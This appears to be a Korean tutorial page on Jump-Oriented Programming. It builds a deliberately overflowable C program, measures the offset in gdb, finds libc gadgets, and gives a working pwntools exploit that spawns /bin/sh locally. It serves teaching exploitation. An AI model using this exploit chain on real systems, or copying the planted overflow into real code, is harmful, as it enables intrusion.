<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>

Excuse the ads! We need some help to keep our site up.

<div id="google_translate_element"></div><script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({pageLanguage: 'ko', layout: google.translate.TranslateElement.InlineLayout.SIMPLE, multilanguagePage: true, gaTrack: true, gaId: 'UA-92563911-1'}, 'google_translate_element');
}
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>

List

JOP(Jump-Oriented Programming)

dispatcher Gadget
(addr : 0xffff0910)

value of rdx registerJOP Gadget

add rdx, 8
jmp [rdx]


0x1000Memory addressValueGadget
value of rsi register0x10080xffff0010mov rax, [rax] ; jmp rsi ;
0xffff09100x10100xffff0710add rax, [rbx] ; jmp [rdi];
value of rdi register0x10180xffff0410mov rdi, [rdx] ; jmp rsi;
0xffff09100x10200xffff0510jmp rax

Proof of concept

Example code

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
 
void vuln(){
    char buf[50];
    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
    read(0, buf, 256);
}
 
void main(){
    seteuid(getuid());
    write(1,"Hello ROP\n",10);
    vuln();
}

Build & Permission

lazenca0x0@ubuntu:~/Exploit/ROP$ gcc -fno-stack-protector -o jop jop.c -ldl

Overflow

lazenca0x0@ubuntu:~/Exploit/JOP$ gdb -q ./jop
Reading symbols from ./jop...(no debugging symbols found)...done.
gdb-peda$ disassemble vuln 
Dump of assembler code for function vuln:
   0x0000000000400756 <+0>:	push   rbp
   0x0000000000400757 <+1>:	mov    rbp,rsp
   0x000000000040075a <+4>:	sub    rsp,0x40
   0x000000000040075e <+8>:	mov    esi,0x400864
   0x0000000000400763 <+13>:	mov    rdi,0xffffffffffffffff
   0x000000000040076a <+20>:	call   0x400630 <dlsym@plt>
   0x000000000040076f <+25>:	mov    QWORD PTR [rbp-0x8],rax
   0x0000000000400773 <+29>:	mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000400777 <+33>:	mov    rsi,rax
   0x000000000040077a <+36>:	mov    edi,0x40086b
   0x000000000040077f <+41>:	mov    eax,0x0
   0x0000000000400784 <+46>:	call   0x400600 <printf@plt>
   0x0000000000400789 <+51>:	lea    rax,[rbp-0x40]
   0x000000000040078d <+55>:	mov    edx,0x100
   0x0000000000400792 <+60>:	mov    rsi,rax
   0x0000000000400795 <+63>:	mov    edi,0x0
   0x000000000040079a <+68>:	call   0x400610 <read@plt>
   0x000000000040079f <+73>:	nop
   0x00000000004007a0 <+74>:	leave  
   0x00000000004007a1 <+75>:	ret    
End of assembler dump.
gdb-peda$ b *0x0000000000400756
Breakpoint 1 at 0x400756
gdb-peda$ b *0x000000000040079a
Breakpoint 2 at 0x40079a
gdb-peda$
gdb-peda$ r
Starting program: /home/lazenca0x0/Exploit/JOP/jop 
Hello ROP


Breakpoint 1, 0x0000000000400756 in vuln ()
gdb-peda$ i r rsp
rsp            0x7fffffffe4a8	0x7fffffffe4a8
gdb-peda$ x/gx 0x7fffffffe4a8
0x7fffffffe4a8:	0x00000000004007d0
gdb-peda$ c
Continuing.
Printf() address : 0x7ffff785e800


Breakpoint 2, 0x000000000040079a in vuln ()
gdb-peda$ i r rsi
rsi            0x7fffffffe460	0x7fffffffe460
gdb-peda$ p/d 0x7fffffffe4a8 - 0x7fffffffe460
$1 = 72
gdb-peda$ 

Exploit method

  1. system 함수를 이용해 "/bin/sh" 실행

system(binsh)


Value
0x7fffffffe498Gadget(POP RAX, ret) Address
0x7fffffffe4a0System function address of libc
0x7fffffffe4a8Gadget(POP RDI, JMP RAX) Address
0x7fffffffe4b0First argument value
  • "/bin/sh" 문자열이 저장된 영역
  • libc offset
    • printf
    • system

  • 가젯의 위치
    • POP RAX, ret
    • POP RDI, JMP RAX

Find gadget

lazenca0x0@ubuntu:~/Exploit/JOP$ sudo ./rp-lin-x64 -f /lib/x86_64-linux-gnu/libc-2.23.so -r 1|grep "pop rax ; ret"
0x00033544: pop rax ; ret  ;  (1 found)
0x0003a727: pop rax ; ret  ;  (1 found)
0x0003a728: pop rax ; ret  ;  (1 found)
0x0003a7f7: pop rax ; ret  ;  (1 found)
0x0003a7f8: pop rax ; ret  ;  (1 found)
0x0003a8a0: pop rax ; ret  ;  (1 found)
0x0003a8a1: pop rax ; ret  ;  (1 found)
0x000abc07: pop rax ; ret  ;  (1 found)
0x00106272: pop rax ; ret  ;  (1 found)
0x00106273: pop rax ; ret  ;  (1 found)
0x001a1448: pop rax ; ret  ;  (1 found)
0x000caabc: pop rax ; retn 0x002F ;  (1 found)
lazenca0x0@ubuntu:~/Exploit/JOP$
lazenca0x0@ubuntu:~/Exploit/JOP$ sudo ./rp-lin-x64 -f /lib/x86_64-linux-gnu/libc-2.23.so -r 1|grep "pop rdi ; jmp rax"
0x00104052: pop rdi ; jmp rax ;  (1 found)
lazenca0x0@ubuntu:~/Exploit/JOP$

Exploit code

from pwn import *
from struct import *
 
#context.log_level = 'debug'
 
#64bit OS - /lib/x86_64-linux-gnu/libc-2.23.so
libcbase_printf_offset = 0x55800
libcbase_system_offset = 0x45390

binsh_offset = 0x18cd57

pop_rax_ret = 0x33544
pop_rdi_jmp_rax = 0x104052
 
r = process('./jop')
 
r.recvn(10)
r.recvuntil('Printf() address : ')
libcbase = int(r.recvuntil('\n'),16)
libcbase -= libcbase_printf_offset
 
payload = "A"*72
payload += p64(libcbase + pop_rax_ret)
payload += p64(libcbase + libcbase_system_offset)
payload += p64(libcbase + pop_rdi_jmp_rax)
payload += p64(libcbase + binsh_offset)
 
r.send(payload)
 
r.interactive()
lazenca0x0@ubuntu:~/Exploit/JOP$ python jop.py 
[+] Starting local process './jop': pid 6105
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

Related site

<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>